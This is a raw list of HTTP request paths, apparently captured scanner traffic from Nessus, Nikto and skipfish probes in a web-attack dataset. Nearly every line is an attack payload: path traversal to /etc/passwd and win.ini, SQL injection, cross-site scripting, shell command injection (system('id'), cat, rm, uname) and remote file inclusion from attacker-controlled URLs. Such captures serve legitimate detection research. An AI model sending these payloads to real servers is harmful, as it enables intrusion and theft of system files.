/cgi-perl/msmmask.exe?mask=/junk334
/o35zot2r.pl?
ftp://192.168.23.203/*
.asp
/scripts/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/top.php?stuff="&del\x09q45798999&rem\x09
/x7pclv4s.mscgi?
/en-us/i686v90l.x?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+06+00+00+00+00+00+00+00+00+00+00+00+00+00+00+20+00+00+e0+44+41+54+41+00+00++>>esbq
/phpmyadmin/hw3.cgi?daysonly=0).system('id').(
/help.php?q='\x0auname >q83228487 #
/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/tzhfyzkbomspvm??
/l13b77e5.cfc?
/javascript/oa_servlets.exe
/tiasystemdescription/
/zuihld5m.jsp?
/phpmyadmin/newsscript.pl?mode=admin
/main.php?frm_daynight=day&frm_passwd=q75353854&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width=
/cgi-bin/cgicso?query=
/ygkjkngd.cgi?
/?">
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/
/javascript/.passwd.phtml
/poker tournament - no limit texas hold'em/
/scripts/sc877q2pzqne.cfm
/recordings/sgdynamo.exe?htname=sgdynamo.exe
/order/login.php?svr_rootscript=@rfiurl
/en-us/33y9gcqq.mscgi?
/nmw0do67.idc?
/scripts/www/delivery/ac.php?bannerid=-1331908787+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ti5957ae]));die;/*
/mv8wxfy9.nsf?
/copatranscript_20061024/
/subscriptions.tar
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=dzp1jwatlet0voxta
/qczkquis.jsp?
/examples/jsp/cal/lang/index.php?file=/etc/passwd
/aj3pf49c.php?
/m2fpztty.pl?
/hjdzm96v.cgi?
/zshscripts/
/cgi/ion-p?page=../../../../../etc/passwd
/zuihld5m.cgi?
/cgi-bin/smartsearch.cgi?keywords=|/bin/cat /etc/passwd|
/xsqln7eb.jspa?
/examples/jsp/error/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/script/fckeditor/editor/dialog/fck_flash.html
/
/phpmyadmin//./../../../../../../../.windows/win.ini
/help.php?q=ver\xa0>q95666948&rem\xa0
/examples/jsp/error/ftp/ftp.pl?dir=../../../../../../etc
/javascript/categories.exe
/cgi-binfaq.php?skin=../../admin/manager&tplpath=admin
/cgi-perl/gw5/gwweb.exe?help=bad-request
/examples/jsp/error/activatemember?activatecode=&member=">
/main.php?frm_daynight=day&frm_passwd=&frm_referer=q33487769&frm_user=&scr_height=&scr_width=
/cgi-bin/.htpasswd
/dslpwt15.cfm?
/main.php?stuff='\x0asleep\x099\x09#
/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
/igtf0zon.idc?
/pam-passwdqc/
//
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/ipb5ri?
/javascript/access-log.1.exe
/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 --
/?
/0qhcnefz.x?
/um7xpn15.jspa?
/examples/jsp/cal/index.php?cat='
/2004conferencedescription/
/homebet/homebet.dll?form=menu&option=menu-signin
/scripts/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00
/manager/forumdisplay.php?fid=21">
/cgi-914/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/popularvirusdescriptions/
/u8yiqilu.cfc?
/?
/javascript/minute.exe
/
/scripts/search.jsp?q=%"
/cgi-bin/activeauctionsuperstore/iteminfo.asp?itemid=42'
/opensearchdescription/
ftp://192.168.27.253/*
/azcrfs8d.htm?
/examples/jsp/cal/mlog.html?screen=/etc/passwd
/en-us/9kr0ih0v.idc?
/rpxyx07v.cfc?
/help.php?q="&rm,q81149724&rem,
/examples/servlets/servletsearch_results.dot?search_query=nessus">/
/0u75ldxq.kspx?
/scripts/netpad.cgi
/top.php?stuff="\x0drm q44371957 #
/zroo33l4.jsp?
/javascript/find.exe
/j4rdyhw8.asp?
/zuihld5m.pl?
/manager/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo
/fmnveedu.mscgi?
/javascript/tape.exe
/top.php?stuff="|ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09
/examples/jsp/sessions/dsweb/services/user-1">
/javascript/backups.exe
/edition"/
/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/e9rx3ya4.asp?
/manager/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/
/169okeyj.cfc?
/fnwhrxyd.kspx?
/scripts/base_local_rules.php?dir=
//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd
/forum_arc.asp?n=`/etc/passwd`|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'`'.
/phpmyadmin/language.php?data_dir=/etc/passwd\x00
/snowboardingxssmallicon/
/showmail.pl?folder=
/aixssh/
/html/partner.php?mainfile=anything&default_theme='
/subscriptions.dump
/cgi-win/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/0w155a7c.pl?
/book review - how to say it when you don't know what to say/
/cgi-bin/simple/view_page?mv_arg=|cat /etc/passwd|
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/?
/fc9t54l7.x?
/jnv890lt.htm?
/en-us/account/search.jsp?q=%"
/scripts/wd7crx47eaml.shtml
/transcript_tomwelsh050429/
/main.php?stuff="ping,-w,9000,-n,1,4.3.2.1|rem,
/miz4r5hz.fts?
/scripts/rvckwz6smkqf.pl
/uc3w3bdi.x?
/javascript/mobile.exe
/scripts/nmap.php?target=|id
/help.php?q="ver\x0b>q76374652&rem\x0b
/examples/jsp/checkbox/includes/converter.inc.php?include_path=/etc/passwd\x00
/gvx7m5ti.asp?
/en-us/i686v90l.asp?
/en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\x00
/javascript/7.exe
/xsqln7eb.php?
/h5sc3gxy.cfc?
/gpasswd/
/webscripts/
/d5a5renl.jsp?
/examples/jsp/cal/includes/config.php?relative_script_path=http://xxxxxxx
/scripts/vzdybnanqpc3.cgi
/s7qus4g3.pl?
/examples/jsp/jsp2/jspx/index.php?chemin=../../../../../../..//etc
..\\..\\..\\..\\..\\..\\windows\\win.ini
/javascript/.passwd.exe
/scripts/prnnucptkixl.inc
/javascript/jdbc.exe
/examples/jsp/cal/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd
/cgi-win/fileseek2.cgi?foot=&head=;cat /etc/passwd|
/calendar_admin.pl?config=|cat /etc/passwd|
/3j8echh0.jspa?
/examples/jsp/error/workarea/contentdesigner/ekformsiframe.aspx?id=">
/jnt3f86c.jspa?
/top.php?stuff="&ver\x0c>q74447142&rem\x0c
/examples/servlets/servlet/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/pam-passwdqc_0/
/uc3w3bdi.cfm?
/j4oqyvga.jsp?
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/mwukuzjaqe.sh+>+/dev/null+&')."]=1
/mrating.exe/
/scripta/
/javascript/import.exe
/scripts/index.php?board=nonexistant522491339
/iv5vkgam.mscgi?
/help.php?q="rm,q11574297&rem,
/scripts/about.php
/esmozg5d.dll?
/javascript/footer.exe
/examples/jsp/colors/index.php?name=your account&profile=anyone">
/forum-ra_professionnel.asp?n=../../boot.ini
/main.php?stuff="\x0drm\x09q16681283\x09#
//.../.../.../.../.../.../.../.../etc/passwd
/search.asp?term=<\x00script>alert('vulnerable')
/cgi-bin/index.php?string='
/en-us/jnv890lt.asp?
/dir_thatware/config.php?root_path=http://192.168.202.96:8080/txenjrxf3?'
/javascript/redir.exe
/downloads/pafiledb.php?action=email&id=4?\"<script>alert('vulnerable')</script>\"
/en-us/i686v90l.cfc?
/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/tzhfyzkbomspvm?
/main.php?logout="ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09
/x2gyorli.htm?
/vjbrrppi.html?
/oldscripts/
/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411
/scripts/content.php?get_action=display_doc&doc_file=credits
/j4oqyvga.htm?
/scripts/calendar.php?month=' union select 1,1,'1331904667','calendarix_month_sql_injection.nasl',1 #
/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008334','5'--
/microsoft windows html help control cross-zone scripting vulnerability/
/scripts/direct.php?rf=/etc/passwd\x00
/help.php?q='&rm\x09q78257168\x09#
/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 --
/javascript/build.exe
/main.php?stuff="ping,-w,7000,-n,1,1.2.3.4&rem,
/cacti/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/cote' content/
/main.php?stuff="rm q82735586&rem
/cgi-bin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00
/panelitprof'l/
/examples/servlets/servlet/index.php?cid='
/shopper.cgi?newpage=../../../../../../etc/passwd
/javascript/mix.exe
/pfdispaly.cgi?../../../../../../etc/passwd
/php/php.exe?c:\winnt\win.ini
/ht8pn8uq.jsp?
/javascript/commerce.exe
/p043snfr.fts?
/javascript/csv.exe
/session/login.php?dest=nessus">
/examples/jsp/colors/htsearch?exclude=`/etc/passwd`
/examples/jsp/jsp2/el/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00
/main.php?logout=&ping;-w;10000;-n;1;1.2.3.4&rem;
/33y9gcqq.pl?
/?
/nuh3zirz.php?
/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00
/scripts/admin.php?dpt=conf&sub=general
/pxagj7n7.kspx?
/jscriptpr2/
/ywaxntrx.cfm?
/main.php?stuff=uname\x09>q57528363\x09#
/azcrfs8d.idc?
/examples/jsp/cal/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00
/main.php?logout=;
/fnwhrxyd.jspa?
/sysuser/docmgr/info.stm?path=
/uc3w3bdi.idc?
/
/examples/jsp/error/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/../copy of
/examples/jsp/error/mapserv.exe?map=mapserver_detect.nasl.map
/auto's/
/scripts/index.php?libdir=http://xxxxxxxx
/main.php?stuff=&uname >q88638447 #
/zqqemp6j.fts?
/main.php?logout="&rm q45435148 #
/vac1l5vm.cfc?
/cgi-exe/msmmask.exe?mask=/junk334
/javascript/openejb.exe
/scripts/tombstone.cfm?profileid=
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=ylqi1ed35uhwi6jxf
/cgi-bin/campas?\x0acat\x0a/etc/passwd\x0a
/examples/jsp/error/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl
/vhzmaia2.php3?
/zuihld5m.cfc?
/scripts/qop0sa1auif9.sh
/en-us/fo564rei.x?
/examples/jsp/error/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00
/archive.php?scriptpath=http://192.168.202.96:8080/vir0v3xfc??
/myscript-notes/
/en-us/account/forumdisplay.php?fid=21">
/d44uk9h2.do?
/top.php?stuff="del q61593836&rem
/o35zot2r.nsf?
/eei78ore.php3?
/l752x1ry.cfm?
/main.php?stuff=2040844887' and 1=1 and ''<>'vzsvhedu
/examples/jsp/error/index.php?op=default&date=200607' union select 1,1284682657,1,1,1,1,1,1,1,1--&blogid=1
/javascript/synced.exe
/l752x1ry.nsf?
/examples/jsp/checkbox/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/javascript/reqs.exe
/examples/jsp/colors/main.php?g2_itemid=../../../../../license\x00
/index.php?album=../../../../../../../../../../etc/passwd\x00
/help.php?q=uname\x09>q95299561\x09#
/zuihld5m.idc?
/examples/servlets/servlet/save.php?file_save=/etc/passwd
/examples/jsp/colors/includes/db_adodb.php?basedir=/etc/passwd\x00
/examples/jsp/cal/login.php?user=">
/mv8wxfy9.html?
/6wb70v0b.do?
/top.php?stuff="|ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/scripts/topic.php?tid='select
/r3le3om5.kspx?
/examples/jsp/colors/help.php?section='qualiteam_xcart_sql_xss.nasl
/cgi-915/a1disp3.cgi?../../../../../../../../../../etc/passwd
/inc/download_center_lite.inc.php?script_root=http://cirt.net/rfiinc.txt?
/en-us/s7qus4g3.pl?
/9o6g5vkn.fts?
/o35zot2r.do?
/main.php?stuff=';rm q22931533 #
/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16
/cgi-bin/.cobalt/message/message.cgi?info=
/scripts/changelog
/i686v90l.html?
/7dbjwpw6.cfc?
/examples/jsp/num/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00
/b5xdqgz2.dll?
/fa8p8lr8.pl?
/v3axg1p8.aspx?
/manager/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00
/javascript/dbase.exe
/fnwhrxyd.nsf?
/javascript/document.js
/examples/jsp/num/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout
/cgi-bin/search.php?allwords=
&cid=0&title=1&desc=1
/pxagj7n7.asp?
/scripts/axdgpyi2bn6f.cfm
/d5a5renl.asp?
/scripts/k0pxpjgnimox.pl
/main.php?logout="\x0asleep 11 #
/linus's_law/
/main.php?stuff="rm;q23861899&rem;
/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00
/q703m78q.html?
/jdx255ea.html?
/scripts/cxvae_g3rjys.asp
/'.$_server['php_self'].'?'.$_server['query_string'].'&act=img&img=delete
/ydexw8by.asp?
/phpmyadmin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 --
/cacti/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/vwmg565s.pl?
/m4kkjf8l.x?
/examples/jsp/jsp2/el/kernel/loadkernel.php?installpath=/etc/passwd\x00
/en-us/i686v90l.cfm?
/en-us/oie504mr.mscgi?
/examples/jsp/colors/index.php?module=
/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 327415864--
/examples/jsp/error/htsearch?exclude=`/etc/passwd`
/javascript/htpasswd.o
/help.php?q=\x0duname\x09>q32573245\x09#
/fnwhrxyd.cgi?
/hrttz9fj.htm?
/_vti_bin/fpcount.exe
/xfkun1ku.fts?
/forum-ra.asp?n=/etc/passwd\x00
/inscription_colloque/
/main.php?logout="rm;q16377729&rem;
/profile.php?author_id='414295592513
/phpmyadmin//../../../../../../../../windows/win.ini
/zuihld5m.pl?
/tuwjta1w.mscgi?
/en-us/account/kernel/loadkernel.php?installpath=/etc/passwd\x00
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/eqskvgtjaq0;'); function v
/main.php?logout=ping;-w;7000;-n;1;4.3.2.1&rem;
/phpmyadmin.exe
/javascript/money.exe
/using logon scripts figure 41102332792318/
/examples/jsp/colors/search.pl?form=../../../../../../etc/passwd\x00
/examples/jsp/error/review.php?id=1&cat=&subcat=">
/en-us/h5sc3gxy.jspa?
/javascript/document.o
/taskdir.exe/
/javascript/mp3.exe
/apavxugx.idc?
/wikka.php?wakka=homepage/../../actions/wikkachanges
/help.php?q="ver >q63986192&rem
/ewc3rz1l.aspx?
/prescriptionforchange/
/0qhcnefz.php?
/scripts/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00
/javascript/travel.exe
/javascript/ganglia.exe
/javascript/.htpasswd.sfish/'"
/phpmyadmin/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 --
/javascript/technical.exe
/javascript/5.exe
/scripts/core/api.php?t_path_core=/etc/passwd\x00
/scripts/index.php?templates_dir=/etc/passwd\x00
/examples/jsp/calfaq.php?skin=../../admin/manager&tplpath=admin
/javascript/technology.exe
/7dbjwpw6.jspa?
/newuser?image=../../database/rbsserv.mdb
/iv5vkgam.kspx?
/webdav/phprun.php?cmd=c:\wce.exe -w
/j4rdyhw8.aspx?
/g8nu2yy7.asp?
/scriptheader/
/cgi-perl/a1disp3.cgi?../../../../../../../../../../etc/passwd
/javascript/favorite.exe
/help.php?q="&rm q44114596 #
/q703m78q.cgi?
/oie504mr.asp?
/scripts/search.jsp?q=%"
/javascript/q4.exe
/t578vqea.exe?
//\..\..\..\..\..\..\..\..\etc/passwd
/phpslideshow.php?directory=x'><'
/addyoursite.php?catid=<script>javascript:alert('vulnerable');</script>
/gy23xnjq.fts?
/cgi-bin/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
/scripts/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'
/examples/jsp/sessions/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
/javascript/dyn.exe
/scripts/activatemember?activatecode=&member=">
/esmozg5d.exe?
/scripts/search.jsp?q=%"
/scripts/lce0cbkfb8xx.inc
/a?
/javascript/posts.exe
/javascript/software.exe
/the schoolgirl group anal'six - schoolgirl love anal'six!/
/scripts/index.php?id=urjhxcl19w'
/cgi-bin/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/ht8pn8uq.x?
/scripts/www/delivery/ac.php?bannerid=-371+or+1=1
/7dbjwpw6.exe?
/package_descriptions/
/subscriptions.bin
/examples/jsp/num/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/cgi-bin/album?mode=album&album=../../../../../../../../etc&dispsize=640&start=0
/j4drbkil.dll?
/?
/recordings/shopexd.asp?catalogid='42
/7uz3ok60.kspx?
/phpmyadmin/index.php?user_langue=../../../../../../../../../../etc/passwd
/excelextractscript/
/javascript/schedule.exe
/manager/html;jsessionid=17f77181a13462b6efdf6796347078a4?org.apache.catalina.filters.csrf_nonce=57f47e5ed52a4c7e1f345608db2700e9
/0w155a7c.mscgi?
/pscripts/
/cheech & chong's the corsican brothers 1984 dvdrip kvcd jamgood(tus release)/
/javascript/citrix.exe
/o35zot2r.php3?
/hwacha_description/
/main.php?stuff="&rm\x09q91551817\x09#
/top.php?stuff="\x0ddel q44371957 #
/main.php?stuff="&uname >q44697755 #
/javascript/.passwd.old
/greasemonkeyscriptforsmalltitles/
/cgi-bin/base_local_rules.php?dir=
/cgi-bin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/0rufe52p.kspx?
/scripts/wxrdqnkjuwmu.inc
/examples/jsp/error/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1
/help.php?q=';uname\x09>q84185561\x09#
/v3axg1p8.pl?
/y8pmygrp.cgi?
/ecmascript/
/statistics-descriptive/
/tuwjta1w.html?
/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat /etc/passwd|
/javascript/rendered.exe
/examples/jsp/checkbox/forum.php?do=viewtopic&cat=1&topic=1&page=1?cross_site_scripting.nasl
/examples/jsp/checkbox/shopexd.asp?catalogid='42
/en-us/h5sc3gxy.cfm?
/iajtej82.fts?
/rbec2ohx.kspx?
/9o6g5vkn.fts?
/pageview postscript v2/
/examples/jsp/colors/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1
/what's_afoot/
//index.html
/top.php?stuff='\x0arm q94927894 #
/vhzmaia2.nsf?
/cgi-local/.htpasswd
/javascript/.passwd.svn-base
/zroo33l4.cfm?
/addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/ipb5ri?
/examples/jsp/cal/core/api.php?t_path_core=/etc/passwd\x00
/javascript/online.exe
/xfkun1ku.mscgi?
/nav/clist.php?root=&cid=0&title=1&desc=1
/j734qobz.pl?
/index.php?config[\"sipssys\"]=@rfiurl
/index.php?categories=1&cat=xx' union/**/ select '1','412596083481','2','comments' /*
/en-us/9kr0ih0v.php?
/module/forum/forum.php?fd=http://192.168.202.118:8080/zz5thkvtmlgl?=';
/6wb70v0b.exe?
/javascript/employment.exe
/ju0u7kfo.aspx?
/examples/servlets/servlet/myevent.php?myevent_path=/etc/passwd\x00
/scripts/setup/index.php?gallery_basedir=http://xxxxxxxx/
/javascript/input.exe
/edzaia0i.php3?
/scripts/tomcat_proxy_directory_traversal.nasl1331904670
/ygkjkngd.jspa?
/snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.118:8080/moclyxlwqyfjnp??
/scripts/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/gallean's/
/en-us/h5sc3gxy.x?
/scripts/2pwudii1mt22.shtml
/help.php?q='\x0adel\x09q61575727\x09#
/scripts/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">
/uc3w3bdi.jsp?
/phpmyadmin//\..\..\..\..\..\..\..\..\etc/passwd
/scripts/count.cgi?align=topcenter
/en-us/account/item.fts?href=">;
/
/manager/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|
/j734qobz.do?
/main.php?logout='uname\x09>q24187781\x09#
/ny1b3qq4.do?
/top.php?stuff=ping;-w;9000;-n;1;1.2.3.4&rem;
/en-us/9kr0ih0v.pl?
/javascript/treasury.exe
/yver8r9o.mscgi?
/recordings/cwmail.exe
/m5103snj.nsf?
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00
/main.php?logout="&sleep 11 #
/quagynka.dll?
/examples/jsp/colors/starnet/addons/slideshow_full.php?album_name='60314352
/x7pclv4s.asp?
/jnv890lt.exe?
/main.php?logout="\x0auname\x09>q98198938\x09#
/javascript/logging.exe
/help.php?q=';rm\x09q84185561\x09#
/examples/jsp/colors/search.php?searchstring=
/cacti/demos/demo.browse.php?filename=/etc/passwd
/help.php?q=ver\x09>q41751651&rem\x09
/javascript/remote.exe
/raanw4ia.cfm?
/help.php?q=";rm q19897274 #
/p043snfr.php?
/imagebar_prescriptiondrugs/
/master's_education/
/main.php?frm_daynight=day&frm_passwd=q39454683&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=
/help.php?q=&ver\x09>q84722362&rem\x09
/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.96:8080/4dckqcc0acprbz?
/javascript/03.exe
/7dbjwpw6.cfc?
/hipscript_020825/
/examples/jsp/jsp2/jspx/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/javascript/sendmail.exe
/javascript/06.exe
/?
/bin/sensepost.exe?/c+dir
/examples/jsp/jsp2/el/index.php?id='
/pmwiki.php?globals[farmd]=/etc/passwd\x00
/vbscript00/
/editprojectissue.do?projectissueid="><"
/iv5vkgam.aspx?
/scripts/qcvjnagy16kc.cfm
/main.php?logout='\x0drm q42494852 #
/manager/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd
/."./."./winnt/win.ini .pl
/clusterframe.jsp?cluster=
/help.php?q="|ping;-w;8000;-n;1;4.3.2.1|rem;
/o6ebbirj.fts?
/o1zj4u9v.nsf?
/examples/jsp/error/viewcvs.cgi/?cvsroot=
/javascript/.svn.exe
/examples/jsp/sessions/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id
/yver8r9o.exe?
/dslpwt15.do?
/javascript/accessibility.exe
/xeklsk.exe/
/examples/servlets/servlet/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id
/169okeyj.php?
/zuihld5m.jspa?
/scripts/t99iadgtkf9h.php
/en-us/account/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
/examples/servlets/servlet/cvslog.cgi?file=
/inc/formmail.inc.php?script_root=@rfiurl
/b5xdqgz2.cgi?
/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
/jujgxwav.cfm?
/ddoworrl.asp?
/main.php?logout="&ping;-w;7000;-n;1;1.2.3.4&rem;
/help.php?q=&ver\x09>q68551744&rem\x09
/fa8p8lr8.kspx?
/examples/jsp/colors/index.php?search='>&searchmode=f
/examples/jsp/jsp2/el/activatemember?activatecode=&member=">
/scripts/nffhikq061nq.php3
/phpmyadmin/shopexd.asp?catalogid='42
/scripts/login.mako
/main.php?logout="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.96:8080/4dckqcc0acprbz??
/examples/jsp/colors/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00
/6wb70v0b.aspx?
/cacti/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/scripts/fgos1sb1c1tr.shtml
/top.php?stuff=&uname\x09>q78957581\x09#
/cgi-bin/erba/start/
/examples/jsp/error/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@
/azcrfs8d.idc?
/scripts/index.asp
/en-us/hipkz026.aspx?
/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/ghl9il?
//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/ao22ww7y.mscgi?
/javascript/cgi-pub.exe
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/lhmpvdjfem.sh+>+/dev/null+&')."]=1
/javascript/17.exe
/javascript/.htpasswd.sfish/skipfish://invalid/;?
/ddoworrl.dll?
/admin/index.php?path_to_script=http://192.168.202.118:8080/ghl9il??&cmd=ls
/examples/jsp/sessions/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/friend.php?op=sitesent&fname=
/apavxugx.mscgi?
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00
/examples/jsp/error/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
/copying/a="%3cscript%20src=%27http://www.example.com/test?rnd=q41226228%27%3e%3c%2fscript%3e";document.writeln(unescape(a))
/b1q8bywu.cfc?
/?
/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
/cgi-bin/dansguardian.pl?deniedurl=
/fa8p8lr8.dll?
/examples/jsp/cal/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1
/sgdynamo.exe?htname=
/examples/jsp/num/source?v=../../../../../../../../../../etc/passwd\x00
/speedscript_vowels/
/ghswfouu.htm?
/scripts/2sfdqydfaknx.asp
/en-us/account/cart32.exe
/static//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
/javascript/.passwd.rhtml
/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1303050841,0,0,0,0,0--
/zv8tv7h8.cfc?
//../../../../../../../../etc/passwd\x00en
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl?
/examples/jsp/jsp2/el/sgdynamo.exe?htname=sgdynamo.exe
/examples/jsp/num/include/theme.inc.php?fullpath=/etc/passwd\x00
/d44uk9h2.jsp?
/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm?
/javascript/cat.exe
/y8pmygrp.cfc?
/raanw4ia.htm?
/scripts/webdist.cgi?distloc=;id
/x2gyorli.pl?
/sophie moon- one of her first hardcore's/
/examples/jsp/colors/cwmail.exe
/web-passwd/
/x2gyorli.jsp?
/uvazfs7p.cfc?
/i2n4v4rl.php?
/scripts/upload.cgi
/manager/admin/admin.php?sid=0'
/modules.php?name=search&file=../../../../../../../../../../etc/passwd\x00
/cgi-binmessagedetail.asp?msg_id='
/main.php?logout='sleep\x098\x09#
/l752x1ry.fts?
/examples/jsp/jsp2/jspx/search.jsp?q=%"
/examples/jsp/sessions/texis.exe/nessus
/rv98iwjp.do?
/h4bi26jd.aspx?
/admin/login.php?path=\">
/lang/lang.php?lang_path=/etc/passwd\x00
/scripts/nffhikq061nq.sh
/hrttz9fj.jspa?
/0w155a7c.cfc?
/jnv890lt.x?
/examples/jsp/colors/bb-hist.sh?histfile=../../../../../etc/passwd
/top.php?stuff='del q24953383 #
/main.php?logout='sleep 10 #
/nosuchurl/>
/top.php?stuff="&ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/'dailyfed/
/examples/jsp/sessions/?">
/a0imiuf1.dll?
/javascript/htpasswd.pfx
/vjbrrppi.jspa?
/ygkjkngd.kspx?
/examples/jsp/cal/index.php?id=0rop9yeuxw'
/javascript/styles.exe
/main.php?logout="&ping;-w;10000;-n;1;4.3.2.1&rem;
/examples/jsp/jsp2/jspx/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00
